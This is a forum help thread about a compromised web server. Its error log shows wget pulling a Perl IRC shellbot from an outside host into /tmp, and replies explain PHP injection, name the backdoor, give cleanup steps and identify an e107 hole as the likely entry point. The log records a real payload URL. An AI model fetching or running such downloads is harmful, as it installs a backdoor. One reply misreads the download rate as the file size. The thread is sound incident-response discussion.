Can anyone please tell me what this is: Code: --2010-06-16 23:28:21-- http://scanbot.ru/bot.txt Resolving scanbot.ru... 85.159.63.185 Connecting to scanbot.ru|85.159.63.185|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 28717 (28K) [text/plain] Saving to: `/tmp/phpRaCehS' 0K .......... .......... ........ 100% 1.13M=0.02s 2010-06-16 23:28:21 (1.13 MB/s) - `/tmp/phpRaCehS' saved [28717/28717] sh: curl: command not found Died at /tmp/.s line 20. sh: curl: command not found Just saw that in my error log using google revealed nothing really. I'm guessing some malware / exploiter, but how can I remove this please? Thanks in advance for any assistance.
I'd be looking very closely for that file, any other hidden or script files in /tmp, and through your access logs for requests that include things like "wget", "curl", "perl", and such. Basically, script kiddies try to exploit vulnerabilities in php etc by causing a script (something like phpbb, geeklog, etc) on your server to run commands, such as downloading and running hack scripts from another site. They like to use /tmp as working space as it is often world read/writeable, which helps them get around file system permissions.
Possibly the main script was downloaded to the home directory of the website that was exploited, and it may clean up after itself to cover it's tracks. Search the access logs of all your sites to find any url request that has those commands in it. That will help you narrow down how they got in, and most likely, which web scripts you need to upgrade or report to the developers as having an exploit. Might be time to have another look over your security also, even though this attempt seems to have failed.
To be honest, it's a bit of a guess. They would use commands that can cause a file to be downloaded (curl was in the log you posted, wget), and then perhaps be unpacked (tar,unzip,rar), and then executed (sh,perl,php). Just to give some examples. The time stamp of the log you posted might give you some help finding where to look in the logs, too.
I'm now running 100% CPU. Some Perl script using it all 3747 www-data 20 0 34088 4580 1400 R 100 0.4 157:27.73 perl
I may have been hasty in saying it looked like that attempt failed. I directed you to look for the source, but don't forget to remove the payload that was saved in /tmp/phpRaCehS. Really have a close look in /tmp at what's in there. That payload file was 1.13M in size. Anyway, that bot.txt looks to be an irc file sharing bot. Kaspersky identifies it as Backdoor.Perl.Shellbot.a.
There was an empty file there, but with another name. I have deleted that, but nothing else is there.
If you haven't already killed that process, you might like to try and find more about it with ps -efww. That will show the command arguments, which will hopefully show what file perl is running. Then, definitely kill that process. It looks like that bot is more indepth than what I first thought (I don't read protuguese..). Then you can start to clean up. http://translate.google.com.au/tran...K&prev=/search?q=sk12pack&start=10&hl=en&sa=N
Thanks again. I have killed the process, and closed off some of my sites that are not needed. CPU usage have now dropped. I will try and clean up later.
Do you run the e107 website system? I found out that this was the culprit on my system. Some security hole in PHP-code caused others to execute malicious perl-scripts on my server.
There is more info on www.e107.org, but afaik it was the "Contact.php" file that was the problem. Although my problem was not like that, but it still came in from e107 in some way.
